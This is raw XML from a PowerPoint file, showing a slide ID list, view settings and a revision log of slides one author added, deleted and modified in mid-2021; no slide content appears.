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513" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="512" r:id="rId4"/>
    <p:sldId id="373" r:id="rId5"/>
    <p:sldId id="444" r:id="rId6"/>
    <p:sldId id="446" r:id="rId7"/>
    <p:sldId id="490" r:id="rId8"/>
    <p:sldId id="491" r:id="rId9"/>
    <p:sldId id="492" r:id="rId10"/>
    <p:sldId id="445" r:id="rId11"/>
    <p:sldId id="493" r:id="rId12"/>
    <p:sldId id="494" r:id="rId13"/>
    <p:sldId id="495" r:id="rId14"/>
    <p:sldId id="496" r:id="rId15"/>
    <p:sldId id="497" r:id="rId16"/>
    <p:sldId id="453" r:id="rId17"/>
    <p:sldId id="454" r:id="rId18"/>
    <p:sldId id="498" r:id="rId19"/>
    <p:sldId id="510" r:id="rId20"/>
    <p:sldId id="499" r:id="rId21"/>
    <p:sldId id="500" r:id="rId22"/>
    <p:sldId id="501" r:id="rId23"/>
    <p:sldId id="502" r:id="rId24"/>
    <p:sldId id="503" r:id="rId25"/>
    <p:sldId id="504" r:id="rId26"/>
    <p:sldId id="505" r:id="rId27"/>
    <p:sldId id="506" r:id="rId28"/>
    <p:sldId id="507" r:id="rId29"/>
    <p:sldId id="467" r:id="rId30"/>
    <p:sldId id="508" r:id="rId31"/>
    <p:sldId id="509" r:id="rId32"/>
    <p:sldId id="511" r:id="rId33"/>
    <p:sldId id="42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1B83AC-F9AE-4056-9599-2DACFAA8A130}" v="41" dt="2023-02-09T14:01:13.2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79" autoAdjust="0"/>
    <p:restoredTop sz="86667" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="71" d="100"/>
          <a:sy n="71" d="100"/>
        </p:scale>
        <p:origin x="156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feng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}"/>
    <pc:docChg chg="addSld delSld modSld">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-07-01T14:18:37.659" v="55" actId="6549"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:38:19.716" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1325061211" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:38:19.716" v="0"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2616338024" sldId="373"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:23.201" v="12" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2789471632" sldId="392"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:28.988" v="22" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2467691949" sldId="394"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:29.667" v="26" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1635951812" sldId="396"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:30.660" v="31" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3665038014" sldId="404"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:32.953" v="39" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2489270501" sldId="411"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:33.208" v="40" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3118374455" sldId="414"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:30.420" v="30" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4266318337" sldId="416"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:33.801" v="41" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4247754591" sldId="418"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3782016356" sldId="428"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:23.068" v="11" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4091828154" sldId="430"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:21.235" v="2" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="593614233" sldId="431"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:32.187" v="36" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2829655940" sldId="434"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:37.137" v="49" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4105321355" sldId="439"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:40.112" v="50" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1827660371" sldId="440"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:41.177" v="51" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="117761190" sldId="441"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:34.634" v="43" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4060643725" sldId="442"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:42.517" v="52" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="177244511" sldId="443"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-07-01T14:03:43.721" v="53" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="969276203" sldId="444"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-07-01T14:03:43.721" v="53" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="969276203" sldId="444"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2518429501" sldId="445"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2089025007" sldId="446"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:21.736" v="3" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="396884143" sldId="447"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:21.938" v="4" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2623075134" sldId="448"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:22.262" v="5" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3726437819" sldId="449"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:22.449" v="7" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2752542596" sldId="450"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:23.913" v="13" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1689162150" sldId="451"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:24.202" v="15" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3213363844" sldId="452"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2427580819" sldId="453"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="156228340" sldId="454"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:22.776" v="9" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="855798641" sldId="455"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:22.612" v="8" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3068364558" sldId="456"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:22.913" v="10" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="565360195" sldId="457"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:24.050" v="14" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2399777802" sldId="458"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:28.818" v="21" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="783190951" sldId="459"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:24.505" v="17" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3533845808" sldId="460"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:27.003" v="18" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="982174642" sldId="461"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:22.278" v="6" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="926730047" sldId="462"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:24.346" v="16" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2128572627" sldId="463"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:29.162" v="23" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3901806330" sldId="464"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:28.042" v="19" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1673180284" sldId="465"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:28.602" v="20" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="369337190" sldId="466"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="965843776" sldId="467"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:29.322" v="24" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1544977207" sldId="468"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:29.501" v="25" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3247576171" sldId="469"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:29.865" v="27" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3121458959" sldId="470"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:30.254" v="28" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2693326884" sldId="471"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:30.263" v="29" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="127914859" sldId="472"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:31.073" v="32" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2516623109" sldId="475"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:31.393" v="33" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3141623341" sldId="476"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:31.714" v="34" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4107473677" sldId="477"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:31.858" v="35" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1773530336" sldId="478"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:34.221" v="42" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2418320045" sldId="481"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:32.426" v="37" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1683867025" sldId="482"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:32.693" v="38" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3022927922" sldId="484"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:34.898" v="44" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1979037057" sldId="485"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:35.185" v="45" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="229412847" sldId="486"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:35.713" v="46" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="127162036" sldId="487"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:36.169" v="47" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1436574554" sldId="488"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:36.576" v="48" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3579863255" sldId="489"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1435293485" sldId="490"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3015196105" sldId="491"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-07-01T14:18:37.659" v="55" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1674251011" sldId="492"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
